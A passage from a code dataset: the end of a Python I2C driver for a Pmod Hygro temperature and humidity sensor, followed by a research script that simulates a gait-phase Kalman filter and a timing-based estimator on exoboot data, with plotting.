begin_i2c(self):\n \"\"\"create i2c bus & update configuration register\"\"\"\n self.i2cbus = smbus2.SMBus(1) # create a new I2C bus\n time.sleep(0.015) # Wait 15ms\n self.i2cbus.write_word_data(PmodHygro.I2C_ADDR, PmodHygro.CONFIG_REG, 0x00) # use non-sequential acquisition mode, all other config bits are default\n\n\n def get_temperature(self):\n \"\"\"get data from temperature register & convert raw data to temperature(celcius)\"\"\"\n self.i2cbus.write_byte(PmodHygro.I2C_ADDR, PmodHygro.TMP_REG) # write temperature register pointer to talk\n time.sleep(0.007) # wait conversion time for temperature(at least 6.35ms at 14bit resolution)\n\n # read 2 byte from temperature register(2 byte)\n temp_raw_front = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n temp_raw_rear = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n temp_raw_front = temp_raw_front << 8\n temp_raw = temp_raw_front | temp_raw_rear\n\n # convert raw data of sensors(provided in reference manual)\n temp_raw /= 0x10000\n self.temperature = temp_raw * 165.0 - 40.0\n\n return self.temperature\n\n\n def get_humidity(self):\n \"\"\"get data from humidity register & convert raw data to relative humidity(%)\"\"\"\n self.i2cbus.write_byte(PmodHygro.I2C_ADDR, PmodHygro.HUM_REG) # write humidity register pointer to talk\n time.sleep(0.007) # wait conversion time for humidity(at least 6.5ms at 14bit resolution)\n\n # read 2 byte from humidity register(2 byte)\n humidity_raw_front = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n humidity_raw_rear = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n humidity_raw_front = humidity_raw_front << 8\n humidity_raw = humidity_raw_front | humidity_raw_rear\n\n # convert raw data of sensors(provided in reference manual)\n humidity_raw /= 0x10000\n self.humidity = humidity_raw * 100.0\n\n return self.humidity\n\n\n def get_temperature_f(self):\n \"\"\"return fahrenheit temperature (°F)\"\"\"\n if self.temperature:\n return self.temperature * 1.8 + 32;\n else:\n return get_temperature() * 1.8 + 32;\n \n","repo_name":"devpola/pmodhygro","sub_path":"pmodhygro/pmodhygro.py","file_name":"pmodhygro.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"72972258969","text":"\"\"\" Simulates the phase estimator EKF and TBE using loaded data. \"\"\"\nimport numpy as np\nfrom time import strftime\nnp.set_printoptions(precision=4)\nimport time\nimport gc\nimport sys\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom training_utils import phase_dist\n\n\nsys.path.append('/Users/leo/Documents/Research/Exo/ML Gait Estimation/ml-gait-estimation/')\nsys.path.append('/Users/leo/Documents/Research/Exo/ML Gait Estimation/ml-gait-estimation/utils')\nsys.path.append('/Users/leo/Documents/Research/Exo/ML Gait Estimation/ml-gait-estimation/old_ekf_funcs')\n\n\nfrom old_phase_ekf import PhaseEKF\nfrom arctanMapFuncs import *\nfrom heelphase_ekf import HeelPhaseEKF\nfrom gait_model import GaitModel_Fourier\nfrom ekf_torque_profile import TorqueProfile\nfrom measurement_noise_model import MeasurementNoiseModel\nfrom timing_based_estimator import TimingPhaseEstimator\nfrom filter_classes import FirstOrderLowPassLinearFilter, FirstOrderHighPassLinearFilter, GenericLinearFilter\nfrom attitudeEstimatorEKFFuncs import extractEulerAngles_new\nfrom heel_strike_detector import HeelStrikeDetector\n\nDO_KIDNAPPING =False\nDO_OVERRIDES = True\nUPDATE_OLS=True\nDO_TBE = True\nDO_NEW_HS_DETECTOR = True\nsideMultiplier = -1\n\nPLOT_EXO_IMU = False\nPLOT_TIMING_INFORMATION = False\nPLOT_MEASURED = True\nPLOT_AHRS = False\nSHOW_FULL_STATE = True\nPLOT_SIM_FOOT_POS = True\nUSE_C = not True\nSPOOF_SENSORS = False\n\nDO_GUARDRAILS = not True\n\n\ngc.disable()\n\n\ndef get_std(cov):\n \"\"\"Get square root of diagonals (standard deviations) from covariances \n \n Args:\n cov (np matrix): a stack (in the third dimension) of positive definite covariances\n \n Returns:\n stdevs (np matrix): an array of standard deviations\n \"\"\"\n \n d, d, N = cov.shape\n std_devs = np.zeros((N, d), dtype=float)\n for ii in range(N):\n std_devs[ii, :] = np.sqrt(np.diag(cov[:, :, ii]))\n return std_devs\n\n\ndef sim_other_models(data, SUBJECT_LEG_LENGTH, torque_profile_path, gait_model_covar_path, gait_model_path, DO_PLOTS=True):\n \"\"\"This function runs the TBE and EKF simulations over a set of exoboot data\n\n Args:\n data (np array): a np matrix containing the exoboot data\n SUBJECT_LEG_LENGTH (float): the participant leg length\n torque_profile_path (str): the path to the torque profile coefficients\n gait_model_covar_path (str): the path to the heteroscedastic model file\n gait_model_path (str): the path to the gait model coefficients\n DO_PLOTS (bool, optional): whether to plot results. Defaults to True.\n\n Returns:\n np arrays: the RMSEs for the gait states for the TBE and EKF simulations\n \"\"\" \n N_data = data.shape[0]\n # print(N_data)\n\n\n attitude_ekf_args = {'sigma_gyro':0.0023,\n 'sigma_accel': 0.0032,\n 'sigma_q_AE':1e2,\n 'Q_pos_scale':1e-10}\n\n #HETEROSCEDASTIC VELOCITY ON\n #stable\n # sigma_foot = 1\n # sigma_shank = 7\n\n # sigma_foot_vel = 10\n # sigma_shank_vel = 20\n\n # sigma_heel_pos_forward = 0.01 #m\n # sigma_heel_pos_up = 0.08 #m\n\n sigma_foot = 1\n sigma_shank = 7\n\n sigma_foot_vel = 10\n sigma_shank_vel = 20\n\n sigma_heel_pos_forward = 0.01 #m\n sigma_heel_pos_up = 0.08 #m\n\n meas_config = 'full'\n\n # #FULL\n R_meas = np.diag([sigma_foot**2,\n sigma_foot_vel**2,\\\n sigma_shank**2,\n sigma_shank_vel**2,\\\n sigma_heel_pos_forward**2, \n sigma_heel_pos_up**2,\n ])\n\n #STABLE\n # sigma_q_phase=0\n # sigma_q_phase_dot=6e-4\n # sigma_q_sL=9e-4\n # sigma_q_incline=6e-3\n\n sigma_q_phase=0\n sigma_q_phase_dot=1e-3\n sigma_q_sL=2e-3\n sigma_q_incline=5e-2\n \n torque_profile = TorqueProfile(torque_profile_path)\n gait_model = GaitModel_Fourier(gait_model_path,phase_order=20, stride_length_order=1, incline_order=1)\n\n\n measurement_noise_model = MeasurementNoiseModel(R_meas, gait_model_covar_path, meas_config=meas_config,DO_XSUB_R=True)\n phase_ekf_args = {'gait_model':gait_model,\n 'torque_profile':torque_profile,\n 'measurement_noise_model':measurement_noise_model,\n 'CANCEL_RAMP':False,\n 'BOOST_BANDWIDTH':False,\n 'sigma_q_phase':sigma_q_phase,\n 'sigma_q_phase_dot':sigma_q_phase_dot,\n 'sigma_q_sL':sigma_q_sL,\n 'sigma_q_incline':sigma_q_incline,\n 'DO_GUARDRAILS':DO_GUARDRAILS\n }\n\n phase_ekf = PhaseEKF(**phase_ekf_args)\n\n if DO_TBE:\n timing_based_estimator = TimingPhaseEstimator()\n else:\n timing_based_estimator = None\n\n\n #INITIALIZE BACKUP EKF\n #velocity het off\n # Q_HP = np.diag([5e-5,1e-3])\n # R_HP = phase_ekf.R_mean\n\n #Velocity het on\n Q_HP = np.diag([1e-4,5e-3])\n R_HP = phase_ekf.R_mean\n \n heelphase_ekf=HeelPhaseEKF(phase_ekf, Q_HP, R_HP, timing_based_estimator=timing_based_estimator)\n\n #set up the filters for the gyro and accel signals\n fc_gyro = 5\n gyroYLowPassFilter = FirstOrderLowPassLinearFilter(fc=fc_gyro,dt=1/100)\n\n fc_accel = 20\n accelZHighPassFilter = FirstOrderHighPassLinearFilter(fc=fc_accel,dt=1/100)\n\n \n #SET UP Filters\n ω = 0.5 * np.pi*2\n ζ= 0.9\n\n A = np.array([\n [0, 1 ] ,\n [-ω**2, -2*ω*ζ ]])\n\n # C = np.array([[-ω**2, -2*ω*ζ ]])\n C = np.array([[1, 0 ]])\n B = np.array([[0, 1]]).T\n # D = np.array([[1.0]])\n D = np.array([[0]])\n HPF_X0 = 0.0*np.ones((A.shape[0],1))\n\n heelPosForwardFilter = GenericLinearFilter(A, B, C, D, HPF_X0)\n\n\n ω = 0.5 * np.pi*2\n ζ= 0.9\n\n A = np.array([\n [0, 1 ] ,\n [-ω**2, -2*ω*ζ ]])\n\n # C = np.array([[-ω**2, -2*ω*ζ ]])\n C = np.array([[1, 0 ]])\n B = np.array([[0, 1]]).T\n # D = np.array([[1.0]])\n D = np.array([[0]])\n\n HPF_X0 = 0.0*np.ones((A.shape[0],1))\n heelPosUpFilter = GenericLinearFilter(A, B, C, D, HPF_X0)\n MAX_TIME_STEP_INTEGRATE = 0.06\n\n #set up HSDetector\n HS_analysis_window = 10\n HSDetector = HeelStrikeDetector(HS_analysis_window)\n\n plot_data = []\n plot_data_measured = []\n\n plot_data_timing_phase_ekf = []\n plot_data_TBE = []\n plot_data_HPEKF = []\n\n plot_states = []\n\n state_std_devs = []\n\n prev=0\n\n\n #INITIALIZE STORAGE FOR COVARS\n P_covars = np.zeros((4, 4, N_data))\n\n tic = time.time()\n\n timeSec_vec_hardware = data[:,0]\n heelAccForward_meas_fromDeltaVelocity_vec_hardware = data[:,33]\n heelAccSide_meas_fromDeltaVelocity_vec_hardware = data[:,34]\n heelAccUp_meas_fromDeltaVelocity_vec_hardware = data[:,35]\n\n heelAccNorm_meas_fromDeltaVelocity_vec_hardware = np.sqrt(heelAccForward_meas_fromDeltaVelocity_vec_hardware**2 +\n heelAccSide_meas_fromDeltaVelocity_vec_hardware**2 +\n (heelAccUp_meas_fromDeltaVelocity_vec_hardware)**2)\n\n for i,x in enumerate(data[:]):\n\n timeSec=x[0]\n dt = timeSec-prev\n\n prev=timeSec\n accelVec_corrected=x[1:4]\n gyroVec_corrected=x[4:7]\n shankAngle_meas = x[24]\n footAngle_meas = x[22]\n\n HSDetected_hardware = x[24]\n accelZ = accelVec_corrected[2]\n gyroY = gyroVec_corrected[1]\n shankAngleVel_meas = x[25]\n footAngleVel_meas = x[23]\n\n\n heelAccForward_meas_fromDeltaVelocity = x[33] #92\n heelAccSide_meas_fromDeltaVelocity = x[34] #70\n heelAccUp_meas_fromDeltaVelocity = x[35]#71\n\n heelAccForward_meas_norm = np.sqrt(heelAccForward_meas_fromDeltaVelocity**2 +\n heelAccSide_meas_fromDeltaVelocity**2 +\n (heelAccUp_meas_fromDeltaVelocity)**2)\n\n if DO_NEW_HS_DETECTOR:\n gyroY_filter = gyroYLowPassFilter.step(i, gyroY)\n accelZ_filter = accelZHighPassFilter.step(i, accelZ)\n HSDetected_sim = HSDetector.detectHS(timeSec, footAngle_meas, footAngleVel_meas, heelAccForward_meas_norm)\n\n else:\n HSDetected_sim = HSDetected_hardware\n\n \n\n phase_ekf.step(i,dt)\n\n if DO_KIDNAPPING and i % 1000 == 0 and i != 0:\n print(timeSec)\n temp_estimate = np.zeros(4)\n temp_estimate[0] = np.random.uniform(0,1)\n temp_estimate[1] = np.random.uniform(-1,1)\n temp_estimate[2] = np.random.uniform(-5,5)\n temp_estimate[3] = np.random.uniform(-10,10)\n phase_ekf.set_x_state_estimate(temp_estimate)\n\n \n dt_int = np.min([dt, MAX_TIME_STEP_INTEGRATE])\n states_heelPosForward, heelPosForward_meas_filt = heelPosForwardFilter.step(i, dt_int, heelAccForward_meas_fromDeltaVelocity)\n heelPosForward_meas_filt = heelPosForward_meas_filt[0,0]\n\n # heelPosForward_meas_filt = np.max([np.min([heelPosForward_meas_filt, 0.4]), -0.25])\n\n states_heelPosUp, heelPosUp_meas_filt = heelPosUpFilter.step(i, dt_int, heelAccUp_meas_fromDeltaVelocity)\n heelPosUp_meas_filt = heelPosUp_meas_filt[0,0]\n # heelPosUp_meas_filt = np.max([np.min([heelPosUp_meas_filt, 0.2]), -0.16])\n\n\n\n z_measured_sim = np.array([footAngle_meas, footAngleVel_meas, shankAngle_meas, shankAngleVel_meas, heelPosForward_meas_filt, heelPosUp_meas_filt])\n phase_ekf.update(i, dt, z_measured_sim)\n\n heelphase_ekf.step(i, timeSec, dt, z_measured_sim, HSDetected_sim, DO_OVERRIDES=DO_OVERRIDES)\n \n strideLength_update_descaled_sim = arctanMap(phase_ekf.x_state_update[2].item(0))\n\n #scale strideLength by subject height\n strideLength_update_descaled_sim = SUBJECT_LEG_LENGTH * strideLength_update_descaled_sim\n\n P_covars[:, :, i] = phase_ekf.P_covar_update\n arctanFromPos = np.arctan2(heelPosUp_meas_filt, heelPosForward_meas_filt) * 180/np.pi\n\n plot_data.append([\n timeSec, #0\n phase_ekf.x_state_update[0].item(0), #1\n phase_ekf.x_state_update[1].item(0), #2\n strideLength_update_descaled_sim, #3\n phase_ekf.x_state_update[3].item(0), #4\n phase_ekf.SSE, #5\n phase_ekf.get_torque(), #6\n HSDetected_sim, #7\n ])\n\n plot_data_timing_phase_ekf.append([\n timeSec,\n phase_ekf.timing_step,\n phase_ekf.timing_measure,\n phase_ekf.timing_update,\n phase_ekf.timing_gain_schedule_R])\n\n plot_data_measured.append([\n timeSec, #0\n phase_ekf.z_model[0].item(0),#1\n phase_ekf.z_model[1].item(0),#2\n phase_ekf.z_model[2].item(0),#3\n phase_ekf.z_model[3].item(0),#4\n phase_ekf.z_model[4].item(0),#5\n phase_ekf.z_model[5].item(0),#6\n z_measured_sim[0], #7\n z_measured_sim[1], #8\n z_measured_sim[2], #9\n z_measured_sim[3],#10\n z_measured_sim[4],#11\n z_measured_sim[5],#12\n phase_ekf.z_model[0].item(0) - 2*np.sqrt(phase_ekf.R[0,0]),#13\n phase_ekf.z_model[0].item(0) + 2*np.sqrt(phase_ekf.R[0,0]), #14\n phase_ekf.z_model[1].item(0) - 2*np.sqrt(phase_ekf.R[1,1]),#15\n phase_ekf.z_model[1].item(0) + 2*np.sqrt(phase_ekf.R[1,1]), #16\n phase_ekf.z_model[2].item(0) - 2*np.sqrt(phase_ekf.R[2,2]),#17\n phase_ekf.z_model[2].item(0) + 2*np.sqrt(phase_ekf.R[2,2]), #18\n phase_ekf.z_model[3].item(0) - 2*np.sqrt(phase_ekf.R[3,3]),#19\n phase_ekf.z_model[3].item(0) + 2*np.sqrt(phase_ekf.R[3,3]), #20\n phase_ekf.z_model[4].item(0) - 2*np.sqrt(phase_ekf.R[4,4]), #21\n phase_ekf.z_model[4].item(0) + 2*np.sqrt(phase_ekf.R[4,4]), #22\n phase_ekf.z_model[5].item(0) - 2*np.sqrt(phase_ekf.R[5,5]), #23\n phase_ekf.z_model[5].item(0) + 2*np.sqrt(phase_ekf.R[5,5]), #24\n arctanFromPos])\n\n plot_data_HPEKF.append([\n timeSec, \n heelphase_ekf.isOverriding,\\\n heelphase_ekf.phase_HP,\n heelphase_ekf.phase_rate_HP,\n SUBJECT_LEG_LENGTH * arctanMap(heelphase_ekf.x_state[0,0]),\n heelphase_ekf.x_state[1,0],\n heelphase_ekf.SSE\n ])\n\n state_std_devs.append([\n phase_ekf.x_state_update[0].item(0) - 2*np.sqrt(phase_ekf.P_covar_update[0,0]),#0\n phase_ekf.x_state_update[0].item(0) + 2*np.sqrt(phase_ekf.P_covar_update[0,0]),#1\n phase_ekf.x_state_update[1].item(0) - 2*np.sqrt(phase_ekf.P_covar_update[1,1]),#2\n phase_ekf.x_state_update[1].item(0) + 2*np.sqrt(phase_ekf.P_covar_update[1,1]),#3\n strideLength_update_descaled_sim - 2*np.sqrt(phase_ekf.P_covar_update[2,2]),#4\n strideLength_update_descaled_sim + 2*np.sqrt(phase_ekf.P_covar_update[2,2]),#5\n phase_ekf.x_state_update[3].item(0) - 2*np.sqrt(phase_ekf.P_covar_update[3,3]),#6\n phase_ekf.x_state_update[3].item(0) + 2*np.sqrt(phase_ekf.P_covar_update[3,3]),#7\n ])\n\n\n if DO_TBE:\n phase_estimate_TBE = timing_based_estimator.phase_estimate_TBE\n plot_data_TBE.append([\n timeSec, \n phase_estimate_TBE,\n timing_based_estimator.stepDuration,\n timing_based_estimator.timeStrideMean])\n\n toc = time.time()\n print(f\"Ran simulation loop in {toc - tic:0.4f} seconds\")\n\n plot_data = np.array(plot_data)\n\n plot_data_measured = np.array(plot_data_measured)\n plot_data_TBE = np.array(plot_data_TBE)\n plot_states = np.array(plot_states)\n plot_data_HPEKF = np.array(plot_data_HPEKF)\n\n state_std_devs = np.array(state_std_devs)\n\n # state_std_devs = get_std(P_covars)\n\n # print(plot_data_timing_heelphase)\n\n # print sampling rate\n\n print('Sampling Rate')\n sample_rate = 1/np.mean(np.diff(data[:,0]))\n print(sample_rate)\n\n\n \n if SHOW_FULL_STATE and DO_PLOTS:\n fig, axs = plt.subplots(5,1,sharex=True,figsize=(10,6))\n\n axs[0].plot(plot_data[:,0], plot_data[:,1],'b', label=r\"$phase_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,0], state_std_devs[:,1], color='blue', alpha=0.3)\n axs[0].plot(plot_data[:,0], state_std_devs[:,0],'b--')\n axs[0].plot(plot_data[:,0], state_std_devs[:,1],'b--')\n axs[0].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,2], label=r\"$phase_{hpekf}$\")\n\n if DO_TBE:\n axs[0].plot(plot_data[:,0], plot_data_TBE[:,1], label=r\"$phase_{TBE}$\") \n\n # axs[0].plot(timeSec_vec_hardware, HSDetected_vec_hardware, label=r\"$HSDetected, hardware$\")\n axs[0].plot(plot_data[:,0], plot_data[:,7],'k', label=r\"$HSDetected Sim$\")\n # axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1],'k', label=r\"$isOverriding sim$\")\n axs[0].legend()\n \n\n axs[1].plot(plot_data[:,0], plot_data[:,2],'b', label=r\"$phasedot_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,2], state_std_devs[:,3], color='blue', alpha=0.3)\n axs[1].plot(plot_data[:,0], state_std_devs[:,2],'b--')\n axs[1].plot(plot_data[:,0], state_std_devs[:,3],'b--')\n # axs[1].fill_between(plot_data[:,0], plot_data[:,6] - 1.96 * state_std_devs[:, 1], plot_data[:,6] + 1.96*state_std_devs[:, 1], color='blue', alpha=0.3)\n axs[1].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,3], label=r\"$phase rate_{hpekf}$\")\n axs[1].legend()\n axs[1].set_ylim([0,1.3])\n\n axs[2].plot(plot_data[:,0], plot_data[:,3],'b', label=r\"$Stride Length_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,4], state_std_devs[:,5], color='blue', alpha=0.3)\n # axs[2].plot(plot_data[:,0], state_std_devs[:,4],'b--')\n # axs[2].plot(plot_data[:,0], state_std_devs[:,5],'b--')\n # axs[2].fill_between(plot_data[:,0], plot_data[:,7] - 1.96 * state_std_devs[:, 2], plot_data[:,7] + 1.96*state_std_devs[:, 2], color='blue', alpha=0.3)\n axs[2].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,4], label=r\"$stride length_{hpekf}$\")\n\n # axs[2].plot(plot_data[:,0], HSDetected_vec_hardware, label=r\"$HSDetected, hardware$\"))\n # axs[2].plot(plot_data[:,0], plot_data[:,7],'k', label=r\"$isOverriding sim$\")\n # axs[2].plot(plot_data[:,0], plot_data[:,19], label=r\"$isOverriding old$\")\n axs[2].legend()\n\n axs[3].plot(plot_data[:,0], plot_data[:,4],'b', label=r\"$Ramp_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,6], state_std_devs[:,7], color='blue', alpha=0.3)\n axs[3].plot(plot_data[:,0], state_std_devs[:,6],'b--')\n axs[3].plot(plot_data[:,0], state_std_devs[:,7],'b--')\n # axs[3].fill_between(plot_data[:,0], plot_data[:,8] - 1.96 * state_std_devs[:, 3], plot_data[:,8] + 1.96*state_std_devs[:, 3], color='blue', alpha=0.3)\n\n axs[3].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,5], label=r\"$ramp_{hpekf}$\")\n\n # axs[3].plot(plot_data[:,0], HSDetected_vec_hardware*10, label=r\"$HSDetected$\")\n # axs[3].plot(plot_data[:,0], plot_data[:,7]*10,'k', label=r\"$isOverriding sim$\")\n # axs[3].plot(plot_data[:,0], plot_data[:,19], label=r\"$isOverriding old$\")\n axs[3].legend()\n axs[3].set_ylim([-14,14])\n\n axs[4].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,6], label=r\"$SSE_{hpekf}$\")\n axs[4].plot(plot_data[:,0], plot_data[:,5], label=r\"$SSE_{sim}$\")\n # axs[4].plot(plot_data[:,0], HSDetected_vec_hardware*1e3, label=r\"$HSDetected$\")\n # axs[4].plot(plot_data[:,0], plot_data[:,7]*1e3,'k', label=r\"$isOverriding sim$\")\n # axs[4].plot(plot_data[:,0], plot_data[:,19], label=r\"$isOverriding old$\")\n\n axs[4].legend()\n\n axs[-1].set_xlabel(\"time (sec)\")\n print(\"this is done (show state)\")\n # plt.show()\n\n if PLOT_MEASURED and DO_PLOTS:\n\n fig, axs = plt.subplots(5,1,sharex=True,figsize=(10,6))\n\n # axs[0].plot(plot_data[:,0], plot_data[:,1], label=r\"$phase_{hardware}$\")\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,1], label=r\"$foot angle, model_{sim}$\")\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,7], label=r\"$foot angle, meas_{sim}$\")\n axs[0].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n # axs[0].plot(plot_data[:,0], HSDetected_vec_hardware*1e1, label=r\"$HSDetected hardware$\")\n axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n # axs[0].fill_between(plot_data_measured[:,0], plot_data_measured[:,16],plot_data_measured[:,17], alpha=.5)\n \n axs[0].legend()\n axs[0].set_ylim([-70,50])\n\n # axs[0].plot(plot_data[:,0], plot_data[:,1], label=r\"$phase_{hardware}$\")\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,2], label=r\"$foot angle vel, model_{sim}$\")\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,8], label=r\"$foot angle vel, meas_{sim}$\")\n axs[1].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[1].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n axs[1].legend()\n # axs[1].set_ylim([-500,500])\n\n # axs[1].plot(plot_data[:,0], plot_data[:,2], label=r\"$phasedot_{hardware}$\")\n axs[2].plot(plot_data_measured[:,0], plot_data_measured[:,3], label=r\"$shank angle, model_{sim}$\")\n axs[2].plot(plot_data_measured[:,0], plot_data_measured[:,9], label=r\"$shank angle, meas_{sim}$\")\n axs[2].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[2].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n # axs[2].fill_between(plot_data_measured[:,0], plot_data_measured[:,18],plot_data_measured[:,19], alpha=.5)\n axs[2].legend()\n axs[2].set_ylim([-70,50])\n\n axs[3].plot(plot_data_measured[:,0], plot_data_measured[:,4], label=r\"$shank angle vel, model_{sim}$\")\n axs[3].plot(plot_data_measured[:,0], plot_data_measured[:,10], label=r\"$shank angle vel, meas_{sim}$\")\n axs[3].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[3].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n axs[3].legend()\n # axs[3].set_ylim([-500,500])\n\n axs[4].plot(plot_data_measured[:,0], plot_data_measured[:,5], label=r\"$foot position, model_{sim}$\")\n axs[4].plot(plot_data_measured[:,0], plot_data_measured[:,11], label=r\"$foot position, meas_{sim}$\")\n axs[4].fill_between(plot_data_measured[:,0], plot_data_measured[:,21],plot_data_measured[:,22], alpha=.5)\n axs[4].plot(plot_data[:,0], plot_data[:,7]*1e-1, 'r', label=r\"$HSDetected Sim$\")\n # axs[4].plot(plot_data[:,0], HSDetected_vec_hardware*1e-1, label=r\"$HSDetected Hardware$\")\n axs[4].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n axs[4].legend()\n # axs[4].set_ylim([-0.5,0.5])\n\n print(\"this is done (plot measured)\")\n\n if PLOT_SIM_FOOT_POS and DO_PLOTS:\n fig, axs = plt.subplots(2,1,sharex=True,figsize=(10,6))\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,5], label=r\"$foot position forward, model_{sim}$\")\n axs[0].fill_between(plot_data_measured[:,0], plot_data_measured[:,21],plot_data_measured[:,22], alpha=.5)\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,11], '-o', label=r\"$foot position forward, meas_{sim}$\")\n # axs[0].plot(plot_data[:,0], HSDetected_vec_hardware*1e-1, label=r\"$HSDetected Hardware$\")\n axs[0].plot(plot_data[:,0], plot_data[:,7]*1e-1, 'r', label=r\"$HSDetected Sim$\")\n axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n axs[0].legend()\n\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,6], label=r\"$foot position up, model_{sim}$\")\n axs[1].fill_between(plot_data_measured[:,0], plot_data_measured[:,23],plot_data_measured[:,24], alpha=.5)\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,12], '-o', label=r\"$foot position up, meas_{sim}$\")\n # axs[1].plot(plot_data[:,0], HSDetected_vec_hardware*1e-1, label=r\"$HSDetected hardware$\")\n axs[1].plot(plot_data[:,0], plot_data[:,7]*1e-1, 'r', label=r\"$HSDetected Sim$\")\n axs[1].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n axs[1].legend()\n\n print(\"this is done (plot foot pos)\")\n\n if not True and DO_PLOTS:\n fig, axs = plt.subplots(2,1,sharex=True,figsize=(10,6))\n axs[0].plot(plot_data_measured[:,0], plot_states[:,0],'-o', label=r\"$state 1$\")\n axs[0].plot(plot_data_measured[:,0], plot_states[:,1],'-o', label=r\"$state 2$\")\n axs[0].set_ylabel('Foot Forward')\n axs[0].legend()\n\n\n axs[1].plot(plot_data_measured[:,0], plot_states[:,2],'-o', label=r\"$state 1$\")\n axs[1].plot(plot_data_measured[:,0], plot_states[:,3],'-o', label=r\"$state 2$\")\n axs[1].set_ylabel('Foot Up')\n axs[1].legend()\n\n\n\n if not True and DO_PLOTS:\n\n fig, axs = plt.subplots(sharex=True,figsize=(10,6))\n axs.plot(plot_data_measured[:,15], plot_data_measured[:,27])\n axs.set_xlabel('Foot pos forward')\n axs.set_ylabel('Foot pos Up')\n\n fig, axs = plt.subplots(sharex=True,figsize=(10,6))\n axs.plot(plot_data_measured[:,0], plot_data_measured[:,28],label='arctan angle')\n axs.set_xlabel('Time')\n\n\n #PLOT FOOT IMU ACCEL\n if True and DO_PLOTS:\n fig, axs = plt.subplots(4,1,sharex=True,figsize=(10,6))\n\n axs[0].plot(timeSec_vec_hardware, heelAccForward_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel acc from delta vel$\")\n\n axs[0].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n\n axs[1].plot(timeSec_vec_hardware, heelAccSide_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel side from delta vel$\")\n\n axs[1].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[1].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n axs[2].plot(timeSec_vec_hardware, heelAccUp_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel up from delta vel$\")\n\n axs[2].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[2].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n axs[3].plot(timeSec_vec_hardware, heelAccNorm_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel accel norm$\")\n axs[3].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[3].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n\n if not True and DO_PLOTS:\n fig, axs = plt.subplots(sharex=True,figsize=(10,6))\n axs.plot(timeSec_vec_hardware[1:], dt_vec_hardware, label=r\"$dt$\")\n\n phase_sim_ekf = plot_data[:,1].reshape(-1,1)\n speed_sim_ekf = plot_data[:,2].reshape(-1,1) * plot_data[:,3].reshape(-1,1)\n incline_sim_ekf = plot_data[:,4].reshape(-1,1)\n\n phase_sim_tbe = plot_data_TBE[:,1].reshape(-1,1)\n\n return phase_sim_ekf, speed_sim_ekf, incline_sim_ekf, phase_sim_tbe\n\n\ndef sim_other_models_over_multiple_files(filenames, vicon_filenames):\n \"\"\"This function runs the simulation of the TBE and EKF over multiple paired exoboot and vicon filenames\n that have been exported using the processing scripts for each participant\n e.g. filenames[i] corresponds to the same trial as vicon_filenames[i]\n\n Args:\n filenames (list): an ordered list of the exoboot filenames\n vicon_filenames (list): an ordered list of the corresponding vicon filenames\n \"\"\" \n phase_rmses_ekf = []\n speed_rmses_ekf = []\n incline_rmses_ekf = []\n phase_rmses_tbe = []\n\n phase_rmses_ekf_ss = []\n speed_rmses_ekf_ss = []\n incline_rmses_ekf_ss = []\n phase_rmses_tbe_ss = []\n\n phase_rmses_ekf_nss = []\n speed_rmses_ekf_nss = []\n incline_rmses_ekf_nss = []\n phase_rmses_tbe_nss = []\n\n 